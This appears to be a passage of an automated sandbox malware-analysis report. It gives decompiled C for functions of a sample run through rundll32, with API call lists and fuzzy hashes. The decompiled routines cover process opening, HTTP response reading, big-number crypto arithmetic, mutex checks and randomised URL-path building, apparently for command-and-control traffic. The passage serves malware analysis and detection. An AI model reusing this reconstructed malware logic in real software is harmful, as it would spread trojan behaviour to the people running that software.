                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 04214C20
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                    • String ID:
                    • API String ID: 3850880919-0
                    • Opcode ID: d32e9560dcde735c531476797089be04fd3a6d1c0ebb09278f28be1663f5bb02
                    • Instruction ID: afef36ae9891e52a920f6181522d5cba970c63b87635e3d5929f90a044d52057
                    • Opcode Fuzzy Hash: d32e9560dcde735c531476797089be04fd3a6d1c0ebb09278f28be1663f5bb02
                    • Instruction Fuzzy Hash: 9421FBB5A10209FFCB11DFA8D9888EEBBF8EF54304B5045AAE505E7210DB34AB45DB14
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04215A5A(intOrPtr _a4) {
                    				void* _t2;
                    				long _t4;
                    				void* _t5;
                    				long _t6;
                    				void* _t7;
                    				void* _t13;
                    
                    				_t2 = CreateEventA(0, 1, 0, 0);
                    				 *0x421a30c = _t2;
                    				if(_t2 == 0) {
                    					return GetLastError();
                    				}
                    				_t4 = GetVersion();
                    				if(_t4 != 5) {
                    					L4:
                    					if(_t13 <= 0) {
                    						_t5 = 0x32;
                    						return _t5;
                    					}
                    					L5:
                    					 *0x421a2fc = _t4;
                    					_t6 = GetCurrentProcessId();
                    					 *0x421a2f8 = _t6;
                    					 *0x421a304 = _a4;
                    					_t7 = OpenProcess(0x10047a, 0, _t6);
                    					 *0x421a2f4 = _t7;
                    					if(_t7 == 0) {
                    						 *0x421a2f4 =  *0x421a2f4 | 0xffffffff;
                    					}
                    					return 0;
                    				}
                    				if(_t4 > 0) {
                    					goto L5;
                    				}
                    				_t13 = _t4 - _t4;
                    				goto L4;
                    			}

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04214603,?), ref: 04215A62
                    • GetVersion.KERNEL32 ref: 04215A71
                    • GetCurrentProcessId.KERNEL32 ref: 04215A88
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04215AA5
                    • GetLastError.KERNEL32 ref: 04215AC4
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                    • String ID:
                    • API String ID: 2270775618-0
                    • Opcode ID: efe6b0fae43ef402a8b9fca52db8e461c4e887b83cca97626a2388a5533b75d0
                    • Instruction ID: cff5bc064802ba47ce1adcf7c2fdd5d640198ec2968849cc4a43c7eb446c6fef
                    • Opcode Fuzzy Hash: efe6b0fae43ef402a8b9fca52db8e461c4e887b83cca97626a2388a5533b75d0
                    • Instruction Fuzzy Hash: 95F08CB0BA2302AFD7209F28B95DB243AA1E770B41F00445AE516C61F0EFB958C1CA15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 46%
                    			E04213D67(intOrPtr* __eax) {
                    				void* _v8;
                    				WCHAR* _v12;
                    				void* _v16;
                    				char _v20;
                    				void* _v24;
                    				intOrPtr _v28;
                    				void* _v32;
                    				intOrPtr _v40;
                    				short _v48;
                    				intOrPtr _v56;
                    				short _v64;
                    				intOrPtr* _t54;
                    				intOrPtr* _t56;
                    				intOrPtr _t57;
                    				intOrPtr* _t58;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr* _t63;
                    				intOrPtr* _t65;
                    				intOrPtr* _t67;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr* _t74;
                    				intOrPtr* _t76;
                    				intOrPtr _t78;
                    				intOrPtr* _t82;
                    				intOrPtr* _t86;
                    				intOrPtr _t102;
                    				intOrPtr _t108;
                    				void* _t117;
                    				void* _t121;
                    				void* _t122;
                    				intOrPtr _t129;
                    
                    				_t122 = _t121 - 0x3c;
                    				_push( &_v8);
                    				_push(__eax);
                    				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                    				if(_t117 >= 0) {
                    					_t54 = _v8;
                    					_t102 =  *0x421a320; // 0x87d5a8
                    					_t5 = _t102 + 0x421b038; // 0x3050f485
                    					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                    					_t56 = _v8;
                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                    					if(_t117 >= 0) {
                    						__imp__#2(0x4219290);
                    						_v28 = _t57;
                    						if(_t57 == 0) {
                    							_t117 = 0x8007000e;
                    						} else {
                    							_t60 = _v32;
                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                    							_t86 = __imp__#6;
                    							_t117 = _t61;
                    							if(_t117 >= 0) {
                    								_t63 = _v24;
                    								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                    								if(_t117 >= 0) {
                    									_t129 = _v20;
                    									if(_t129 != 0) {
                    										_v64 = 3;
                    										_v48 = 3;
                    										_v56 = 0;
                    										_v40 = 0;
                    										if(_t129 > 0) {
                    											while(1) {
                    												_t67 = _v24;
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												_t122 = _t122;
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                    												if(_t117 < 0) {
                    													goto L16;
                    												}
                    												_t69 = _v8;
                    												_t108 =  *0x421a320; // 0x87d5a8
                    												_t28 = _t108 + 0x421b0bc; // 0x3050f1ff
                    												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                    												if(_t117 >= 0) {
                    													_t74 = _v16;
                    													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                    													if(_t117 >= 0 && _v12 != 0) {
                    														_t78 =  *0x421a320; // 0x87d5a8
                    														_t33 = _t78 + 0x421b078; // 0x76006f
                    														if(lstrcmpW(_v12, _t33) == 0) {
                    															_t82 = _v16;
                    															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                    														}
                    														 *_t86(_v12);
                    													}
                    													_t76 = _v16;
                    													 *((intOrPtr*)( *_t76 + 8))(_t76);
                    												}
                    												_t71 = _v8;
                    												 *((intOrPtr*)( *_t71 + 8))(_t71);
                    												_v40 = _v40 + 1;
                    												if(_v40 < _v20) {
                    													continue;
                    												}
                    												goto L16;
                    											}
                    										}
                    									}
                    								}
                    								L16:
                    								_t65 = _v24;
                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                    							}
                    							 *_t86(_v28);
                    						}
                    						_t58 = _v32;
                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                    					}
                    				}
                    				return _t117;
                    			}





































                    APIs
                    • SysAllocString.OLEAUT32(04219290), ref: 04213DB7
                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04213E99
                    • SysFreeString.OLEAUT32(00000000), ref: 04213EB2
                    • SysFreeString.OLEAUT32(?), ref: 04213EE1
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$Free$Alloclstrcmp
                    • String ID:
                    • API String ID: 1885612795-0
                    • Opcode ID: 4a11438184a4ee64a6d7927037d621bb001f3b3c83d7289970dc5cf32042281e
                    • Instruction ID: 2a0fb4a216df2a195dfe588674a46f8565a3660395994ba60c3eb0639fb8deb1
                    • Opcode Fuzzy Hash: 4a11438184a4ee64a6d7927037d621bb001f3b3c83d7289970dc5cf32042281e
                    • Instruction Fuzzy Hash: 17515E75E00619DFCB11DFA8C4889AEF7FAFF89704B144594E915EB220DB72AD41CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E0421420F(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				void _v156;
                    				void _v428;
                    				void* _t55;
                    				unsigned int _t56;
                    				signed int _t66;
                    				signed int _t74;
                    				void* _t76;
                    				signed int _t79;
                    				void* _t81;
                    				void* _t92;
                    				void* _t96;
                    				signed int* _t99;
                    				signed int _t101;
                    				signed int _t103;
                    				void* _t107;
                    
                    				_t92 = _a12;
                    				_t101 = __eax;
                    				_t55 = E042125C1(_a16, _t92);
                    				_t79 = _t55;
                    				if(_t79 == 0) {
                    					L18:
                    					return _t55;
                    				}
                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                    				_t81 = 0;
                    				_t96 = 0x20;
                    				if(_t56 == 0) {
                    					L4:
                    					_t97 = _t96 - _t81;
                    					_v12 = _t96 - _t81;
                    					E04212E5D(_t79,  &_v428);
                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E0421375F(_t101,  &_v428, _a8, _t96 - _t81);
                    					E0421375F(_t79,  &_v156, _a12, _t97);
                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                    					_t66 = E04212E5D(_t101, 0x421a1d0);
                    					_t103 = _t101 - _t79;
                    					_a8 = _t103;
                    					if(_t103 < 0) {
                    						L17:
                    						E04212E5D(_a16, _a4);
                    						E04211212(_t79,  &_v428, _a4, _t97);
                    						memset( &_v428, 0, 0x10c);
                    						_t55 = memset( &_v156, 0, 0x84);
                    						goto L18;
                    					}
                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                    					do {
                    						if(_v8 != 0xffffffff) {
                    							_push(1);
                    							_push(0);
                    							_push(0);
                    							_push( *_t99);
                    							L0421818A();
                    							_t74 = _t66 +  *(_t99 - 4);
                    							asm("adc edx, esi");
                    							_push(0);
                    							_push(_v8 + 1);
                    							_push(_t92);
                    							_push(_t74);
                    							L04218184();
                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                    								_t74 = _t74 | 0xffffffff;
                    								_v16 = _v16 & 0x00000000;
                    							}
                    						} else {
                    							_t74 =  *_t99;
                    						}
                    						_t106 = _t107 + _a8 * 4 - 0x1a8;
                    						_a12 = _t74;
                    						_t76 = E04212EE3(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                    						while(1) {
                    							 *_t99 =  *_t99 - _t76;
                    							if( *_t99 != 0) {
                    								goto L14;
                    							}
                    							L13:
                    							_t92 =  &_v156;
                    							if(E04215776(_t79, _t92, _t106) < 0) {
                    								break;
                    							}
                    							L14:
                    							_a12 = _a12 + 1;
                    							_t76 = E04214A1C(_t79,  &_v156, _t106, _t106);
                    							 *_t99 =  *_t99 - _t76;
                    							if( *_t99 != 0) {
                    								goto L14;
                    							}
                    							goto L13;
                    						}
                    						_a8 = _a8 - 1;
                    						_t66 = _a12;
                    						_t99 = _t99 - 4;
                    						 *(0x421a1d0 + _a8 * 4) = _t66;
                    					} while (_a8 >= 0);
                    					_t97 = _v12;
                    					goto L17;
                    				}
                    				while(_t81 < _t96) {
                    					_t81 = _t81 + 1;
                    					_t56 = _t56 >> 1;
                    					if(_t56 != 0) {
                    						continue;
                    					}
                    					goto L4;
                    				}
                    				goto L4;
                    			}






















                    APIs
                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 042142C2
                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 042142D8
                    • memset.NTDLL ref: 04214381
                    • memset.NTDLL ref: 04214397
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: memset$_allmul_aulldiv
                    • String ID:
                    • API String ID: 3041852380-0
                    • Opcode ID: 74c91a5f9d2daca3f79283ed7f36f4f2f00684050b845e8f43d6e5d0319d00af
                    • Instruction ID: afd4ab62953a9de8cbd3017e3c296416bb4b1f8c3300732ddb691318483e5248
                    • Opcode Fuzzy Hash: 74c91a5f9d2daca3f79283ed7f36f4f2f00684050b845e8f43d6e5d0319d00af
                    • Instruction Fuzzy Hash: 1641A331B20219ABEB10EE68DC80BEE77B5EF65314F104569F909A71A0DB70BE55CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 42%
                    			E0421135F(void* __eax, void* __ecx) {
                    				char _v8;
                    				void* _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				void* __esi;
                    				void* _t30;
                    				intOrPtr _t38;
                    				intOrPtr* _t39;
                    				intOrPtr* _t41;
                    				void* _t54;
                    				long _t64;
                    				void* _t67;
                    				void* _t69;
                    
                    				_t58 = __ecx;
                    				_t67 = __eax;
                    				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                    					L2:
                    					_t30 = _t67;
                    					_pop(_t68);
                    					_t69 = _t30;
                    					_t64 = 0;
                    					ResetEvent( *(_t69 + 0x1c));
                    					_push( &_v8);
                    					_push(4);
                    					_push( &_v20);
                    					_push( *((intOrPtr*)(_t69 + 0x18)));
                    					if( *0x421a164() != 0) {
                    						L9:
                    						if(_v8 == 0) {
                    							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                    						} else {
                    							 *0x421a174(0, 1,  &_v12);
                    							if(0 != 0) {
                    								_t64 = 8;
                    							} else {
                    								_t38 = E042163FD(0x1000);
                    								_v16 = _t38;
                    								if(_t38 == 0) {
                    									_t64 = 8;
                    								} else {
                    									_push(0);
                    									_push(_v8);
                    									_push( &_v20);
                    									while(1) {
                    										_t41 = _v12;
                    										_t61 =  *_t41;
                    										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                    										ResetEvent( *(_t69 + 0x1c));
                    										_push( &_v8);
                    										_push(0x1000);
                    										_push(_v16);
                    										_push( *((intOrPtr*)(_t69 + 0x18)));
                    										if( *0x421a164() != 0) {
                    											goto L17;
                    										}
                    										_t64 = GetLastError();
                    										if(_t64 == 0x3e5) {
                    											_t64 = E04215867( *(_t69 + 0x1c), _t61, 0xffffffff);
                    											if(_t64 == 0) {
                    												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                    												if(_t64 == 0) {
                    													goto L17;
                    												}
                    											}
                    										}
                    										L19:
                    										E042117AB(_v16);
                    										if(_t64 == 0) {
                    											_t64 = E042116E7(_v12, _t69);
                    										}
                    										goto L22;
                    										L17:
                    										_t64 = 0;
                    										if(_v8 != 0) {
                    											_push(0);
                    											_push(_v8);
                    											_push(_v16);
                    											continue;
                    										}
                    										goto L19;
                    									}
                    								}
                    								L22:
                    								_t39 = _v12;
                    								 *((intOrPtr*)( *_t39 + 8))(_t39);
                    							}
                    						}
                    					} else {
                    						_t64 = GetLastError();
                    						if(_t64 != 0x3e5) {
                    							L8:
                    							if(_t64 == 0) {
                    								goto L9;
                    							}
                    						} else {
                    							_t64 = E04215867( *(_t69 + 0x1c), _t58, 0xffffffff);
                    							if(_t64 == 0) {
                    								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                    								goto L8;
                    							}
                    						}
                    					}
                    					return _t64;
                    				} else {
                    					_t54 = E042158EE(__ecx, __eax);
                    					if(_t54 != 0) {
                    						return _t54;
                    					} else {
                    						goto L2;
                    					}
                    				}
                    			}

















                    APIs
                    • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 04212409
                    • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 04212422
                    • ResetEvent.KERNEL32(?), ref: 0421249B
                    • GetLastError.KERNEL32 ref: 042124B6
                      • Part of subcall function 042158EE: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 04215905
                      • Part of subcall function 042158EE: SetEvent.KERNEL32(?), ref: 04215915
                      • Part of subcall function 042158EE: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 04215947
                      • Part of subcall function 042158EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0421596C
                      • Part of subcall function 042158EE: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 0421598C
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: EventHttpInfoQuery$ErrorLastReset$ObjectSingleWait
                    • String ID:
                    • API String ID: 2176574591-0
                    • Opcode ID: 3860d71ca1668a0a2b60bc0ace1649569d890d0de6a340c604d2bd1e8415b4b8
                    • Instruction ID: 90bcd6c56697bc923e9661aacd7cfbebec0724205e169b00b68e16059752e4b3
                    • Opcode Fuzzy Hash: 3860d71ca1668a0a2b60bc0ace1649569d890d0de6a340c604d2bd1e8415b4b8
                    • Instruction Fuzzy Hash: F741D432710201EBDB219FA8DC44A6AB3F9EF94360F1505A4F556E3170EB70F941DB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E04213FD2(signed int _a4, signed int* _a8) {
                    				void* __ecx;
                    				void* __edi;
                    				signed int _t6;
                    				intOrPtr _t8;
                    				intOrPtr _t12;
                    				short* _t19;
                    				void* _t25;
                    				void* _t26;
                    				signed int* _t28;
                    				CHAR* _t30;
                    				long _t31;
                    				intOrPtr* _t32;
                    
                    				_t6 =  *0x421a310; // 0xd448b889
                    				_t32 = _a4;
                    				_a4 = _t6 ^ 0x109a6410;
                    				_t8 =  *0x421a320; // 0x87d5a8
                    				_t3 = _t8 + 0x421b87e; // 0x61636f4c
                    				_t25 = 0;
                    				_t30 = E042132D0(_t3, 1);
                    				if(_t30 != 0) {
                    					_t25 = CreateEventA(0x421a34c, 1, 0, _t30);
                    					E042117AB(_t30);
                    				}
                    				_t12 =  *0x421a2fc; // 0x4000000a
                    				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04212AB4() != 0) {
                    					L12:
                    					_t28 = _a8;
                    					if(_t28 != 0) {
                    						 *_t28 =  *_t28 | 0x00000001;
                    					}
                    					_t31 = E0421196A(_t32, _t26);
                    					if(_t31 == 0 && _t25 != 0) {
                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                    					}
                    					if(_t28 != 0 && _t31 != 0) {
                    						 *_t28 =  *_t28 & 0xfffffffe;
                    					}
                    					goto L20;
                    				} else {
                    					_t19 =  *0x421a118( *_t32, 0x20);
                    					if(_t19 != 0) {
                    						 *_t19 = 0;
                    						_t19 = _t19 + 2;
                    					}
                    					_t31 = E042178DB(0,  *_t32, _t19, 0);
                    					if(_t31 == 0) {
                    						if(_t25 == 0) {
                    							L22:
                    							return _t31;
                    						}
                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                    						if(_t31 == 0) {
                    							L20:
                    							if(_t25 != 0) {
                    								CloseHandle(_t25);
                    							}
                    							goto L22;
                    						}
                    					}
                    					goto L12;
                    				}
                    			}

                    APIs
                      • Part of subcall function 042132D0: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04A99D58,00000000,?,?,69B25F44,00000005,0421A00C,4D283A53,?,?), ref: 04213306
                      • Part of subcall function 042132D0: lstrcpy.KERNEL32(00000000,00000000), ref: 0421332A
                      • Part of subcall function 042132D0: lstrcat.KERNEL32(00000000,00000000), ref: 04213332
                    • CreateEventA.KERNEL32(0421A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0421186F,?,?,?), ref: 04214013
                      • Part of subcall function 042117AB: HeapFree.KERNEL32(00000000,00000000,04212976,00000000,?,?,00000000), ref: 042117B7
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,0421186F,00000000,00000000,?,00000000,?,0421186F,?,?,?), ref: 04214071
                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0421186F,?,?,?), ref: 0421409F
                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0421186F,?,?,?), ref: 042140B7
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                    • String ID:
                    • API String ID: 73268831-0
                    • Opcode ID: f631358878c90f7de9c8df79e076ab25f19c5e4ea47e64ad64875674bc5aedcf
                    • Instruction ID: c83b3560bace01d54620fbd131af1134bf265504772bd5e55cefba14572115ff
                    • Opcode Fuzzy Hash: f631358878c90f7de9c8df79e076ab25f19c5e4ea47e64ad64875674bc5aedcf
                    • Instruction Fuzzy Hash: 09214B327203125BD3356A699C48E6B73D9EFA8B15F050115FD8997171DB25EC418641
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E042117C0(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                    				intOrPtr _v12;
                    				void* _v16;
                    				void* _v28;
                    				char _v32;
                    				void* __esi;
                    				void* _t29;
                    				void* _t38;
                    				signed int* _t39;
                    				void* _t40;
                    
                    				_t36 = __ecx;
                    				_v32 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				_v12 = _a4;
                    				_t38 = E04216710(__ecx,  &_v32);
                    				if(_t38 != 0) {
                    					L12:
                    					_t39 = _a8;
                    					L13:
                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                    						_t23 =  &(_t39[1]);
                    						if(_t39[1] != 0) {
                    							E0421238A(_t23);
                    						}
                    					}
                    					return _t38;
                    				}
                    				if(E042140C7(0x40,  &_v16) != 0) {
                    					_v16 = 0;
                    				}
                    				_t40 = CreateEventA(0x421a34c, 1, 0,  *0x421a3e4);
                    				if(_t40 != 0) {
                    					SetEvent(_t40);
                    					Sleep(0xbb8);
                    					CloseHandle(_t40);
                    				}
                    				_push( &_v32);
                    				if(_a12 == 0) {
                    					_t29 = E04215E53(_t36);
                    				} else {
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_t29 = E04212B1E(_t36);
                    				}
                    				_t41 = _v16;
                    				_t38 = _t29;
                    				if(_v16 != 0) {
                    					E04214B59(_t41);
                    				}
                    				if(_t38 != 0) {
                    					goto L12;
                    				} else {
                    					_t39 = _a8;
                    					_t38 = E04213FD2( &_v32, _t39);
                    					goto L13;
                    				}
                    			}

                    APIs
                    • CreateEventA.KERNEL32(0421A34C,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730), ref: 04211811
                    • SetEvent.KERNEL32(00000000), ref: 0421181E
                    • Sleep.KERNEL32(00000BB8), ref: 04211829
                    • CloseHandle.KERNEL32(00000000), ref: 04211830
                      • Part of subcall function 04215E53: WaitForSingleObject.KERNEL32(00000000,?,?,?,04211850,?,04211850,?,?,?,?,?,04211850,?), ref: 04215F2D
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                    • String ID:
                    • API String ID: 2559942907-0
                    • Opcode ID: 2b5a63bd9a855234fdf29eaf08e7dcff08e9e0a3180fb4b2543fbde2f15ad660
                    • Instruction ID: 32fb6245c370c590fb0086ab5d018bdab6d7355f31fac5706ba291469b632a0a
                    • Opcode Fuzzy Hash: 2b5a63bd9a855234fdf29eaf08e7dcff08e9e0a3180fb4b2543fbde2f15ad660
                    • Instruction Fuzzy Hash: A621CB72F10119ABEB10AFE49884AFEB3F9EF28354B018425EA11A7060DB74F941C7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E04215ACD(unsigned int __eax, void* __ecx) {
                    				void* _v8;
                    				void* _v12;
                    				signed int _t21;
                    				signed short _t23;
                    				char* _t27;
                    				void* _t29;
                    				void* _t30;
                    				unsigned int _t33;
                    				void* _t37;
                    				unsigned int _t38;
                    				void* _t41;
                    				void* _t42;
                    				int _t45;
                    				void* _t46;
                    
                    				_t42 = __eax;
                    				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                    				_t38 = __eax;
                    				_t30 = RtlAllocateHeap( *0x421a2d8, 0, (__eax >> 3) + __eax + 1);
                    				_v12 = _t30;
                    				if(_t30 != 0) {
                    					_v8 = _t42;
                    					do {
                    						_t33 = 0x18;
                    						if(_t38 <= _t33) {
                    							_t33 = _t38;
                    						}
                    						_t21 =  *0x421a2f0; // 0x18be026f
                    						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                    						 *0x421a2f0 = _t23;
                    						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                    						memcpy(_t30, _v8, _t45);
                    						_v8 = _v8 + _t45;
                    						_t27 = _t30 + _t45;
                    						_t38 = _t38 - _t45;
                    						_t46 = _t46 + 0xc;
                    						 *_t27 = 0x2f;
                    						_t13 = _t27 + 1; // 0x1
                    						_t30 = _t13;
                    					} while (_t38 > 8);
                    					memcpy(_t30, _v8, _t38 + 1);
                    				}
                    				return _v12;
                    			}

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0421194D,00000000,?,?,04216ABB,?,04A995B0), ref: 04215AD8
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 04215AF0
                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0421194D,00000000,?,?,04216ABB,?,04A995B0), ref: 04215B34
                    • memcpy.NTDLL(00000001,?,00000001), ref: 04215B55
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmp
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmp
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: memcpy$AllocateHeaplstrlen
                    • String ID:
                    • API String ID: 1819133394-0
                    • Opcode ID: c650e53997b3be1c5ea4c03f2f4caa9c3f7a926808952089ffa466a7079f5df0
                    • Instruction ID: ed33e0f73d1ba115062d4358aa2ceef8c356fa733630e9d5f7801b4f4434fdf9
                    • Opcode Fuzzy Hash: c650e53997b3be1c5ea4c03f2f4caa9c3f7a926808952089ffa466a7079f5df0
                    • Instruction Fuzzy Hash: 15110672B00215FFD7148B69EC88E9EBFFDEBA1260B0401A6F50597160EB75AE44C7A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E04212AB4() {
                    				char _v264;
                    				void* _v300;
